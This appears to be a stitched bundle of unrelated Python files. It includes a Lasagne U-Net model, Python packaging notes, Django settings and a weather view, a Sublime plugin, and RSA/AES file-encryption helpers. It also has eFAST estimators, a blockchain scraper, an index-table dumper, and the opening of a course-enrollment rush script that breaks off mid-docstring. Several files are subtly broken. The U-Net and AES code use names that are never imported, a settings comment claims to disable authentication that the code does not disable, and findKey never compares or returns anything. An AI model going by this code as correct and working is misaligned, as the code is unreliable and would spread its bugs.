import lasagne
from lasagne.layers import InputLayer,Conv2DLayer, ConcatLayer, Pool2DLayer, Deconv2DLayer
from lasagne.layers import ReshapeLayer, DimshuffleLayer, NonlinearityLayer, SliceLayer, DropoutLayer
from lasagne.layers import batch_norm
from lasagne.regularization import regularize_network_params, l2
from sklearn.metrics import f1_score, accuracy_score, roc_auc_score
from sklearn.metrics import roc_curve, recall_score, precision_score
from models.model import Model
PRED_Y_MIN = 1e-10
PRED_Y_MAX = 1
class uNet(Model):
    """U-Net style encoder/decoder segmentation network (Lasagne/Theano).

    Builds a 5-level contracting path, four transposed-convolution
    expansion steps with cropped skip connections, and a per-pixel
    softmax over nmb_out_classes output classes.
    """
    def __init__(self,
                 X_layer,
                 n_filters=64,
                 filter_size=3,
                 name='unetSoftmax',
                 pad='valid',
                 nmb_out_classes=2,
                 do_dropout=False):
        """Build the network for inputs shaped like X_layer.output_shape.

        NOTE(review): do_dropout is forwarded to build_graph but the
        dropout layers there are added unconditionally -- confirm intent.
        """
        super(uNet, self).__init__(name)
        input_shape = X_layer.output_shape
        self.build_graph(input_shape, n_filters, filter_size, nmb_out_classes, do_dropout, pad)
        # All trainable parameters reachable from the segmentation output.
        self.weights = lasagne.layers.get_all_params(self.net['output_segmentation'], trainable=True)
        # Flattened (pixels x classes) softmax used by the training loss.
        self.pred_y = lasagne.layers.get_output(self.net['output_for_loss'], X_layer.input_var)
        self.outlayer_for_loss = self.net['output_for_loss']
        print 'self.outlayer_for_loss.output_shape', self.outlayer_for_loss.output_shape
        self.outlayer_seg = self.net['output_segmentation']
        self.pred_img_shape = self.outlayer_seg.output_shape[2:]
        seg_output = lasagne.layers.get_output(self.outlayer_seg, X_layer.input_var)
        print 'self.outlayer_seg.output_shape', self.outlayer_seg.output_shape
        # A compiled prediction function only makes sense when X_layer is a
        # genuine InputLayer carrying its own input_var.
        if isinstance(X_layer, lasagne.layers.InputLayer):
            self.predict_fun = theano.function([X_layer.input_var], seg_output)
        self.input_img_shape = input_shape[2:]
        self.pred_img_shape = self.outlayer_seg.output_shape[2:]
    def build_graph(self, input_shape, n_filters, filter_size, nmb_out_classes, do_dropout, pad):
        """Assemble self.net (an OrderedDict of Lasagne layers).

        Encoder: conv blocks 1-5 with pooling between them; decoder:
        deconv 1-4 each concatenated with the matching encoder feature map
        (center-cropped); head: 1x1 conv, dimshuffle + reshape to
        (pixels, classes), softmax, and reshape back to image layout.
        """
        nonlinearity = lasagne.nonlinearities.rectify
        self.net = OrderedDict()
        self.net['input'] = InputLayer(input_shape, name='input')
        print "Input: self.net['input']", self.net['input'].output_shape
        ### Conv1
        self.net['conv_1_1'] = Conv2DLayer(self.net['input'],
                                           num_filters=n_filters,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "\nConv11: self.net['conv_1_1']", self.net['conv_1_1'].output_shape
        self.net['dropout1'] = DropoutLayer(self.net['conv_1_1'], p=0.2)
        print "Dropout1: self.net['dropout1']", self.net['dropout1'].output_shape
        self.net['conv_1_2'] = Conv2DLayer(batch_norm(self.net['dropout1']),
                                           num_filters=n_filters,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv12: self.net['conv_1_2']", self.net['conv_1_2'].output_shape
        self.net['pool1'] = Pool2DLayer(batch_norm(self.net['conv_1_2']), 2)
        print "\nPool1: self.net['pool1']", self.net['pool1'].output_shape
        ### Conv2
        self.net['conv_2_1'] = Conv2DLayer(batch_norm(self.net['pool1']),
                                           num_filters=n_filters * 2,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv21: self.net['conv_2_1']", self.net['conv_2_1'].output_shape
        self.net['dropout2'] = DropoutLayer(batch_norm(self.net['conv_2_1']), p=0.2)
        print "Dropout2: self.net['dropout2']", self.net['dropout2'].output_shape
        self.net['conv_2_2'] = Conv2DLayer(batch_norm(self.net['dropout2']),
                                           num_filters=n_filters * 2,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv22: self.net['conv_2_2']", self.net['conv_2_2'].output_shape
        self.net['pool2'] = Pool2DLayer(self.net['conv_2_2'], 2)
        print "\nPool2: self.net['pool2']", self.net['pool2'].output_shape
        ### Conv3
        self.net['conv_3_1'] = Conv2DLayer(batch_norm(self.net['pool2']),
                                           num_filters=n_filters * 4,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv31: self.net['conv_3_1']", self.net['conv_3_1'].output_shape
        self.net['dropout3'] = DropoutLayer(self.net['conv_3_1'], p=0.2)
        print "Dropout3: self.net['dropout3']", self.net['dropout3'].output_shape
        self.net['conv_3_2'] = Conv2DLayer(batch_norm(self.net['dropout3']),
                                           num_filters=n_filters * 4,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv32: self.net['conv_3_2']", self.net['conv_3_2'].output_shape
        self.net['pool3'] = Pool2DLayer(self.net['conv_3_2'], 2)
        print "\nPool3: self.net['pool3']", self.net['pool3'].output_shape
        ### Conv4
        self.net['conv_4_1'] = Conv2DLayer(batch_norm(self.net['pool3']),
                                           num_filters=n_filters * 8,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv41: self.net['conv_4_1']", self.net['conv_4_1'].output_shape
        self.net['conv_4_2'] = Conv2DLayer(batch_norm(self.net['conv_4_1']),
                                           num_filters=n_filters * 8,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv42: self.net['conv_4_2']", self.net['conv_4_2'].output_shape
        # Deeper levels use heavier dropout (p=0.5).
        self.net['dropout4'] = DropoutLayer(self.net['conv_4_2'], p=0.5)
        print "Dropout4: self.net['dropout4']", self.net['dropout4'].output_shape
        self.net['pool4'] = Pool2DLayer(self.net['dropout4'], 2)
        print "\nPool4: self.net['pool4']", self.net['pool4'].output_shape
        ### Conv5
        self.net['conv_5_1'] = Conv2DLayer(batch_norm(self.net['pool4']),
                                           num_filters=n_filters * 16,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv51: self.net['conv_5_1']", self.net['conv_5_1'].output_shape
        self.net['conv_5_2'] = Conv2DLayer(batch_norm(self.net['conv_5_1']),
                                           num_filters=n_filters * 16,
                                           filter_size=filter_size,
                                           nonlinearity=nonlinearity,
                                           W=lasagne.init.GlorotNormal(),
                                           pad=pad)
        print "Conv52: self.net['conv_5_2']", self.net['conv_5_2'].output_shape
        self.net['dropout5'] = DropoutLayer(self.net['conv_5_2'], p=0.5)
        print "Dropout5: self.net['dropout5']", self.net['dropout5'].output_shape
        ### Deconv1
        self.net['deconv1'] = Deconv2DLayer(batch_norm(self.net['dropout5']),
                                            num_filters=n_filters * 8,
                                            filter_size=2,
                                            nonlinearity=nonlinearity,
                                            W=lasagne.init.GlorotNormal(),
                                            stride=2,
                                            crop='valid')
        print "\nDeconv1: self.net['deconv1']", self.net['deconv1'].output_shape
        # Skip connection: center-crop the encoder map to match spatially.
        self.net['concat1'] = ConcatLayer([self.net['deconv1'], self.net['dropout4']],
                                          cropping=(None, None, "center", "center"))
        print "Concat1: self.net['concat1']", self.net['concat1'].output_shape
        self.net['convde_1_1'] = Conv2DLayer(self.net['concat1'],
                                             num_filters=n_filters * 8,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde11: self.net['convde_1_1']", self.net['convde_1_1'].output_shape
        self.net['convde_1_2'] = Conv2DLayer(batch_norm(self.net['convde_1_1']),
                                             num_filters=n_filters * 8,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde12: self.net['convde_1_2']", self.net['convde_1_2'].output_shape
        ### Deconv2
        self.net['deconv2'] = Deconv2DLayer(batch_norm(self.net['convde_1_2']),
                                            num_filters=n_filters * 4,
                                            filter_size=2,
                                            nonlinearity=nonlinearity,
                                            W=lasagne.init.GlorotNormal(),
                                            stride=2,
                                            crop=pad)
        print "\nDeconv2: self.net['deconv2']", self.net['deconv2'].output_shape
        self.net['concat2'] = ConcatLayer([self.net['deconv2'], self.net['conv_3_2']],
                                          cropping=(None, None, "center", "center"))
        print "Concat2: self.net['concat2']", self.net['concat2'].output_shape
        self.net['convde_2_1'] = Conv2DLayer(self.net['concat2'],
                                             num_filters=n_filters * 4,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde21: self.net['convde_2_1']", self.net['convde_2_1'].output_shape
        self.net['convde_2_2'] = Conv2DLayer(batch_norm(self.net['convde_2_1']),
                                             num_filters=n_filters * 4,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde22: self.net['convde_2_2']", self.net['convde_2_2'].output_shape
        ### Deconv3
        self.net['deconv3'] = Deconv2DLayer(batch_norm(self.net['convde_2_2']),
                                            num_filters=n_filters * 2,
                                            filter_size=2,
                                            nonlinearity=nonlinearity,
                                            W=lasagne.init.GlorotNormal(),
                                            stride=2,
                                            crop=pad)
        print "\nDeconv3: self.net['deconv3']", self.net['deconv3'].output_shape
        self.net['concat3'] = ConcatLayer([self.net['deconv3'], self.net['conv_2_2']],
                                          cropping=(None, None, "center", "center"))
        print "Concat3: self.net['concat3']", self.net['concat3'].output_shape
        self.net['convde_3_1'] = Conv2DLayer(self.net['concat3'],
                                             num_filters=n_filters * 2,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde31: self.net['convde_3_1']", self.net['convde_3_1'].output_shape
        self.net['convde_3_2'] = Conv2DLayer(batch_norm(self.net['convde_3_1']),
                                             num_filters=n_filters * 2,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde32: self.net['convde_3_2']", self.net['convde_3_2'].output_shape
        ### Deconv4
        self.net['deconv4'] = Deconv2DLayer(batch_norm(self.net['convde_3_2']),
                                            num_filters=n_filters,
                                            filter_size=2,
                                            nonlinearity=nonlinearity,
                                            W=lasagne.init.GlorotNormal(),
                                            stride=2,
                                            crop=pad)
        print "\nDeconv4: self.net['deconv4']", self.net['deconv4'].output_shape
        self.net['concat4'] = ConcatLayer([self.net['deconv4'], self.net['conv_1_2']],
                                          cropping=(None, None, "center", "center"))
        print "Concat4: self.net['concat4']", self.net['concat4'].output_shape
        self.net['convde_4_1'] = Conv2DLayer(self.net['concat4'],
                                             num_filters=n_filters,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde41: self.net['convde_4_1']", self.net['convde_4_1'].output_shape
        self.net['convde_4_2'] = Conv2DLayer(batch_norm(self.net['convde_4_1']),
                                             num_filters=n_filters,
                                             filter_size=filter_size,
                                             nonlinearity=nonlinearity,
                                             W=lasagne.init.GlorotNormal(),
                                             pad=pad)
        print "Convde42: self.net['convde_4_2']", self.net['convde_4_2'].output_shape
        ####
        # 1x1 convolution producing per-pixel class scores (no nonlinearity;
        # softmax is applied after flattening below).
        self.net['output'] = Conv2DLayer(self.net['convde_4_2'],
                                         num_filters=nmb_out_classes,
                                         filter_size=1,
                                         nonlinearity=None)
        print "\nself.net['output']", self.net['output'].output_shape
        ####
        # change dimention of batch size and number of classes
        self.net['dimshuffle'] = DimshuffleLayer(self.net['output'], (0, 2, 3, 1))
        dimshuffle_output_shape = self.net['dimshuffle'].output_shape
        print "self.net['dimshuffle']", self.net['dimshuffle'].output_shape
        # pull into a vector of size (-1, nmb_classes)
        self.net['flattened'] = ReshapeLayer(self.net['dimshuffle'], (-1, nmb_out_classes))
        print "self.net['flattened']", self.net['flattened'].output_shape
        self.net['softmax_flattened'] = NonlinearityLayer(self.net['flattened'],
                                                          nonlinearity=lasagne.nonlinearities.softmax)
        print "self.net['softmax_flattened']", self.net['softmax_flattened'].output_shape
        self.net['output_for_loss'] = self.net['softmax_flattened']
        print "self.net['output_for_loss']", self.net['output_for_loss'].output_shape
        # slice matrix for lesion
        #self.net['slice_flattened_segmentation'] = SliceLayer(self.net['softmax_flattened'],
        #                                                      indices=slice(1,2),
        #                                                      axis=0)
        #print "self.net['slice_flattened_segmentation']", self.net['slice_flattened_segmentation'].output_shape
        # Undo the flattening: back to image layout, classes as channel axis.
        self.net['reshaped_segmentation'] = ReshapeLayer(self.net['softmax_flattened'], dimshuffle_output_shape)
        print "self.net['reshaped_segmentation']", self.net['reshaped_segmentation'].output_shape
        self.net['output_segmentation'] = DimshuffleLayer(self.net['reshaped_segmentation'], (0, 3, 1, 2))
        print "self.net['output_segmentation']", self.net['output_segmentation'].output_shape
    def predict(self, X, *args, **kwargs):
        """
        Input: X

        Run the compiled segmentation function on X.  Only available when
        the network was constructed from a real InputLayer (see __init__).
        """
        if not hasattr(self, 'predict_fun'):
            raise ValueError("you should add a valid predict_fun to this class"
                             "(no automatic predict generates since X isn't an InputLayer")
        return self.predict_fun(X)
    def get_loss_components(self, target, weights):
        """Return (weighted cross-entropy, L2 penalty, weighted accuracy,
        per-class max prediction, per-class min prediction) for *target*."""
        #target = T.transpose(target)
        # Clip predictions away from zero so log() stays finite.
        ce = lasagne.objectives.categorical_crossentropy(T.clip(self.pred_y,PRED_Y_MIN,PRED_Y_MAX), target)
        # put weights = weights if want
        ce_weighed = lasagne.objectives.aggregate(ce, weights=weights, mode='normalized_sum')
        reg_l2 = regularize_network_params(self.outlayer_for_loss, l2) * 10 ** -5
        acc = T.eq(T.argmax(self.pred_y, axis=1), target)
        acc = lasagne.objectives.aggregate(acc, weights=weights, mode='normalized_sum')
        # Extremes of the predictions, useful for monitoring saturation.
        max_0_pred = self.pred_y.max(axis=0)
        min_1_pred = self.pred_y.min(axis=0)
        return ce_weighed, reg_l2, acc, max_0_pred, min_1_pred
|
# ### Summary of testing, debugging, packaging and distributing
# * unittest is a framework for developing reliable automated tests
# * You define test cases by subclassing from unittest.TestCase
# * unittest.main() is useful for running all of the tests in a module
# * setUp() and tearDown() run code before and after each test method
# * Test methods are defined by creating method names that start with test_
# * TestCase.assert... methods make a test method fail when the right
# conditions aren't met
# * Use TestCase.assertRaises() in a with-statement to check that the right
# exceptions are thrown in a test
# * Python's standard debugger is called PDB
# * PDB is a standard command-line debugger
# * pdb.set_trace() can be used to stop program execution and enter the
# debugger
# * Your REPL's prompt will change to (Pdb) when you're in the debugger
# * You can access PDB's built-in help system by typing help
# * Use “python -m pdb <script name>" to run a program under PDB from
# the start
# * PDB's where command shows the current call stack
# * PDB's next command lets execution continue to the next line of code
# * PDB's continue command lets program execution continue indefinitely, or
# until you stop it with control-c
# * PDB's list command shows you the source code at your current location
# * PDB's return command resumes execution until the end of the current
# function
# * PDB's print command lets you see the values of objects in the debugger
# * Use quit to exit PDB
# * Virtual environments are light-weight, self-contained Python
# installations that any user can create
# * pyvenv is the standard tool for creating virtual environments
# * pyvenv accepts both a source-installation argument as well as a
#   directory name in which to create the new environment
# * To use a virtual environment, you need to run its activate script
# * When you activate a virtual environment, your prompt is modified to
# remind you
# * The distutils package is used to help you distribute your Python code
# * distutils is generally used inside a setup.py script which users run to
# install your software
# * The main function in distutils is setup()
# * setup() takes a number of arguments describing both the source files
# as well as metadata for the code
# * The most common way to use setup.py is to install code using python
# setup.py install
# * setup.py can also be used to generate distributions of your code
# * Distributions can be zip files, tarballs, or several other formats
# * Pass --help to setup.py to see all of its options
# * Three common tools for installing third-party software are distutils,
# easy_install, and pip
# * The central repository for Python packages is the Python Package
# Index, also called PyPI or "cheeseshop"
# * You can install easy_install by downloading and running
# distribute_setup.py
# * You use easy_install to install modules by running easy_install
# package-name from the command line
# * You can install pip via easy_install
# * To install modules with pip, use the subcommand notation pip install
# package-name
# * divmod() calculates the quotient and remainder for a division operation
# at one time
# * reversed() function can reverse a sequence
# * You can pass -m to your Python command to have it run a module as a
# script
# * Debugging makes it clear that Python is evaluating everything at run
#   time
# * You can use the __file__ attribute on a module to find out where its
# source file is located
# * Third-party python is generally installed into your installation's
#   site-packages directory
# * nose is a useful tool for working with unittest-based tests |
from rover.settings import *
# Override the project database with a local SQLite file for the test run.
DATABASES['default'] = {
    'ENGINE': 'django.db.backends.sqlite3',
    'NAME': BASE_DIR / 'db.sqlite3',
}
# Disable Authentication for Tests
REST_FRAMEWORK = {
    'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
    'PAGE_SIZE': 100
}
# coding=utf-8
import sublime_plugin, datetime
class insertDatetimeCommand(sublime_plugin.TextCommand):
    """Sublime Text command that inserts the current timestamp at every
    selection, replacing any selected text.

    The `format` argument chooses one of three strftime layouts; any other
    value inserts the raw datetime object's string form.
    """
    def run(self, edit, format):
        timestamp = datetime.datetime.now()
        if format == "ymd":
            # yyyy-mm-dd
            timestamp = timestamp.strftime("%Y-%m-%d")
        elif format == "ymdhms":
            # yyyy-mm-dd hh:mm:ss (%X expands to %H:%M:%S)
            timestamp = timestamp.strftime("%Y-%m-%d %X")
        elif format == "ymdhm":
            # yyyy-mm-dd_hh-mm
            timestamp = timestamp.strftime("%Y-%m-%d_%H-%M")
        # For each region in the current selection...
        for r in self.view.sel():
            # ...replace the region's contents with the timestamp
            # (erase first so selected text is replaced intuitively).
            self.view.erase(edit, r)
            self.view.insert(edit, r.begin(), timestamp) |
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from pydrive.auth import GoogleAuth
import quickstart
import hashlib
def authenticate():
    """Authenticate against Google Drive via a local-webserver OAuth flow,
    then upload a small 'Hello.txt' test file.

    Side effects only: opens a browser consent page and writes one file to
    the authenticated account's Drive. Returns None.
    """
    # Fix: GoogleDrive was referenced without ever being imported (only
    # GoogleAuth is imported at module level), so this function raised
    # NameError at runtime. Import it here from pydrive.
    from pydrive.drive import GoogleDrive
    gauth = GoogleAuth()
    gauth.LocalWebserverAuth()  # spins up a local webserver for the OAuth redirect
    drive = GoogleDrive(gauth)
    file1 = drive.CreateFile({'title': 'Hello.txt'})  # Create GoogleDriveFile instance with title 'Hello.txt'.
    file1.SetContentString('Hello World!')  # Set content of the file from given string.
    file1.Upload()
def store_privKey(private_key):
    """Serialize *private_key* to unencrypted PKCS#8 PEM and write it to
    'private_key.pem' in the current working directory."""
    serialized = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.PKCS8,
        encryption_algorithm=serialization.NoEncryption()
    )
    with open('private_key.pem', 'wb+') as key_file:
        key_file.write(serialized)
def store_pubKey(public_key):
    """Return *public_key* serialized as a SubjectPublicKeyInfo PEM string."""
    pem_bytes = public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo
    )
    return pem_bytes.decode()
def readKey():
    """Return every line (newlines preserved) of 'public_keys.txt'.

    The file is opened read-only and must already exist in the working
    directory.
    """
    with open("public_keys.txt") as key_file:
        return key_file.readlines()
def keyToBytes(public_key):
    """Return *public_key* serialized as SubjectPublicKeyInfo PEM bytes."""
    return public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo
    )
def genRSAKey():
    """Generate and return a fresh 2048-bit RSA private key (e = 65537)."""
    return rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
    )
def encryptRSA(byteKey, public_key):
    """RSA-encrypt *byteKey* under *public_key* using OAEP (MGF1/SHA-256)."""
    oaep_padding = padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None
    )
    return public_key.encrypt(byteKey, oaep_padding)
def decryptRSA(encryptedAESKey, private_key):
    """RSA-decrypt *encryptedAESKey* with *private_key* using OAEP
    (MGF1/SHA-256); returns the original plaintext bytes."""
    oaep_padding = padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None
    )
    return private_key.decrypt(encryptedAESKey, oaep_padding)
def findKey(file, identifier):
    # NOTE(review): this function looks unfinished -- it slices a candidate
    # key out of each entry (stride 464, chars 400..433) into `toCompare`,
    # but never compares it against `identifier` and never returns anything.
    # Confirm the intended behavior before relying on it.
    y = 0
    count = len(file)
    start = 400              # offset of the first slice -- TODO confirm layout
    pkLength = 434           # one-past-end of the first slice (34 chars)
    while (y != count):
        pKey = file[y]
        toCompare = ''
        # Accumulate the characters of this entry's slice.
        for x in range (start, pkLength):
            toCompare += pKey[x]
        y = y + 1
        # Advance both offsets to the next entry (stride 464).
        start = start + 464
        pkLength = pkLength + 464
def AESKey():
    """Generate and return a 32-byte AES key.

    The key is the SHA-256 digest of 16 cryptographically random bytes.

    Fixes vs. the original: `random` was never imported in this module
    (NameError), `hashlib.sha256()` was fed a str built with chr() instead
    of bytes (TypeError), and the non-cryptographic `random` module is the
    wrong source of randomness for key material -- `secrets` is used instead.
    """
    import secrets  # local import: the module top only imports hashlib
    seed = secrets.token_bytes(16)
    return hashlib.sha256(seed).digest()
def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
    """ Encrypts a file using AES (CBC mode) with the
        given key.
        key:
            The encryption key - bytes of length 16, 24 or 32.
        in_filename:
            Name of the input file
        out_filename:
            If None, '<in_filename>.enc' will be used.
        chunksize:
            Sets the size of the chunk which the function
            uses to read and encrypt the file. Must be
            divisible by 16.

        Output layout: 8-byte little-endian plaintext size, 16-byte IV,
        then the ciphertext (space-padded to a 16-byte boundary).
    """
    import os
    import struct  # local imports: neither module is imported at file top
    if not out_filename:
        out_filename = in_filename + '.enc'
    # Fixes vs. the original: the IV and the padding were built as str
    # (chr()/' '), which raises TypeError when mixed with the bytes read
    # from the file; the IV also came from the predictable `random` module.
    iv = os.urandom(16)
    # NOTE(review): AES (PyCrypto/pycryptodome) is not imported anywhere in
    # this file -- confirm the real module provides it.
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)
    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - len(chunk) % 16)
                outfile.write(encryptor.encrypt(chunk))
|
import numpy as np
from ..utils import read_hdf5_array
from ..sampling import eFAST_omega
def eFAST_first_order(Y, M, omega):
    """Sobol first order index estimator."""
    n_samples = Y.shape[0]
    spectrum = np.fft.fft(Y)
    # One-sided power spectrum, excluding the zero-frequency term.
    power = np.power(np.absolute(spectrum[np.arange(1, int((n_samples + 1) / 2))]) / n_samples, 2)
    total_variance = 2 * np.sum(power)
    # Variance carried by omega and its first M harmonics (main effect).
    harmonics = np.arange(1, M + 1) * int(omega) - 1
    main_effect = 2 * np.sum(power[harmonics])
    return main_effect / total_variance
def eFAST_total_order(Y, omega):
    """Sobol total order index estimator."""
    n_samples = Y.shape[0]
    spectrum = np.fft.fft(Y)
    # One-sided power spectrum, excluding the zero-frequency term.
    power = np.power(np.absolute(spectrum[np.arange(1, int((n_samples + 1) / 2))]) / n_samples, 2)
    total_variance = 2 * np.sum(power)
    # Low-frequency variance (below omega/2) belongs to all other inputs.
    complement_variance = 2 * np.sum(power[np.arange(int(omega / 2))])
    return 1 - complement_variance / total_variance
def eFAST_indices(filepath_Y, num_params, M=4, selected_iterations=None):
    """Estimate Sobol' first and total order indices with the extended
    Fourier Amplitude Sensitivity Test (eFAST).

    High first-order values flag important parameters (main effects only);
    the total order additionally accounts for parameter interactions, so low
    total-order values point to non-important parameters.

    Parameters
    ----------
    filepath_Y : Path or str
        Filepath to model outputs ``y`` in .hdf5 format obtained by running
        the model according to eFAST samples.
    num_params : int
        Number of model inputs.
    M : int
        Interference factor, usually 4 or higher; must be consistent with
        the eFAST sampling.
    selected_iterations : array of ints, optional
        Iterations to include when computing the indices.

    Returns
    -------
    dict
        {"First order": array, "Total order": array}.

    References
    ----------
    :cite:ts:`saltelli1999quantitative`;
    original implementation:
    https://github.com/SALib/SALib/blob/master/src/SALib/analyze/fast.py
    """
    y = read_hdf5_array(filepath_Y)
    y = y.flatten()
    if selected_iterations is not None:
        y = y[selected_iterations]
    iterations = len(y)
    iterations_per_param = iterations // num_params
    # Recreate the frequency vector used when the eFAST sample was drawn.
    omega = eFAST_omega(iterations_per_param, num_params, M)
    first = np.full(num_params, np.nan)
    total = np.full(num_params, np.nan)
    if selected_iterations is not None:
        iterations_per_param_current = len(y) // num_params
        assert iterations_per_param == len(y) / num_params
    else:
        iterations_per_param_current = iterations_per_param
    for param in range(num_params):
        lo = param * iterations_per_param
        window = np.arange(lo, lo + iterations_per_param)[:iterations_per_param_current]
        first[param] = eFAST_first_order(y[window], M, omega[0])
        total[param] = eFAST_total_order(y[window], omega[0])
    return {
        "First order": first,
        "Total order": total,
    }
|
#!/usr/bin/env python3
import sys
import psycopg2
import scraper
import database
""" Loads and processes all data related to block with given number """
def process_block(block_number):
    """Load the block with the given number plus all of its transactions and
    persist them, tolerating records that were already saved."""
    block = scraper.load_block(block_number)
    try:
        database.save_block(block)
    except psycopg2.IntegrityError:
        # Duplicate primary key: the block was imported earlier.
        print("Block <{}> already loaded".format(block_number))
    for tx_hash in block["transactions"]:
        transaction = scraper.load_transaction(tx_hash)
        try:
            database.save_transaction(transaction)
        except psycopg2.IntegrityError:
            print("Transaction <{}> already loaded".format(tx_hash))
""" Processes blocks as per CLI args """
def process():
    """Read a starting block number and a block count from the CLI and
    process that many consecutive blocks."""
    if len(sys.argv) != 3:
        # Guard clause: exactly two positional arguments are required.
        print("Pass block number and number of blocks as arguments")
        return
    start = int(sys.argv[1])
    count = int(sys.argv[2])
    for offset in range(count):
        current = start + offset
        process_block(current)
        print("Processed block <{}>".format(current))
process()
|
# Create your views here.
from pprint import pprint
from django.shortcuts import render
from lab2 import GetWeather_Data
from lab2.GetWeather_Data import CitySearchError
def index(request):
    """Render the lab2 landing page."""
    return render(request, "lab2/lab2.html")
def weather(request):
    """Render the weather page for the 'latitude'/'longitude' GET params.

    When the lookup raises CitySearchError, the template is rendered with
    data=None instead of propagating the error.
    """
    latitude = request.GET['latitude']
    longitude = request.GET['longitude']
    try:
        data = GetWeather_Data.from_lat_long(latitude, longitude)
        pprint(data)  # debug output -- consider switching to logging
    except CitySearchError as e:
        data = None
        # Fix: Python 3 exceptions carry no `.message` attribute, so the
        # original `print(e.message)` raised AttributeError inside the
        # handler (unless CitySearchError defines one -- printing the
        # exception itself is safe either way).
        print(e)
    return render(request, "lab2/weather.html", {'data': data})
|
# Read N (name, time) pairs, then a name X; print the total of the times
# that appear strictly after X's first occurrence in input order.
N = int(input())
names = []
times = []
for _ in range(N):
    name, t = input().split()
    names.append(name)
    times.append(int(t))
X = input()
position = names.index(X)
print(sum(times[position + 1:]))
|
import numpy as np
from os import fstat
from .utils import *
def ReadIndex(f, fileSize):
    """Pretty-print the rest of *f* as 64-byte index-table rows.

    Each row holds eight little-endian uint64 fields. Returns False when
    more than one trailing byte cannot be interpreted, True otherwise.
    """
    remaining = fileSize - f.tell()
    if remaining <= 0:
        return True
    nRows = remaining // 64
    table = f.read(remaining)
    rule = "-" * 107
    print(" ")
    print(rule)
    print("|     Step |     Rank |       PGPtr |      VarPtr |      AttPtr |"
          "      EndPtr |   Timestamp |      unused |")
    print("+" + "-" * 105 + "+")
    for row in range(nRows):
        fields = np.frombuffer(table, dtype=np.uint64, count=8, offset=row * 64)
        # First two columns are 9 wide, the remaining six are 12 wide.
        cells = [str(v).rjust(9) for v in fields[:2]]
        cells += [str(v).rjust(12) for v in fields[2:]]
        print("|" + " |".join(cells) + " |")
    print(rule)
    if fileSize - f.tell() > 1:
        print("ERROR: There are {0} bytes at the end of file"
              " that cannot be interpreted".format(fileSize - f.tell() - 1))
        return False
    return True
def DumpIndexTable(fileName):
    """Print the header and contents of the index-table file *fileName*;
    return True when the whole file parsed cleanly."""
    banner = "========================================================"
    print(banner)
    print(" Index Table File: " + fileName)
    print(banner)
    status = False
    with open(fileName, "rb") as f:
        fileSize = fstat(f.fileno()).st_size
        status = ReadHeader(f, fileSize, "Index Table")
        if status:
            status = ReadIndex(f, fileSize)
    return status
# This module is a library; invoking it directly is an error.
if __name__ == "__main__":
    print("ERROR: Utility main program is bp4dbg.py")
|
import requests
from threading import Thread
import sys
import queue
import urllib.parse
import pickle
from sample.parse import get_selected_course
class select_course(object):
    """Fire concurrent course-enrollment POSTs at the selection servers.

    Uses a previously saved session cookie and cached ASP.NET view-state
    values so the rush can start immediately, without re-parsing pages.
    """
    def __init__(self,username,MAX,TIMEOUT,index1='',index2=''):
        """Initialize session state.

        MAX multiplies the server URL list (controls queue pressure).
        index1/index2 are the course-list page number and the course's
        position on that page, used to build the enrollment POST.
        self.view caches each page's __VIEWSTATE parameters captured
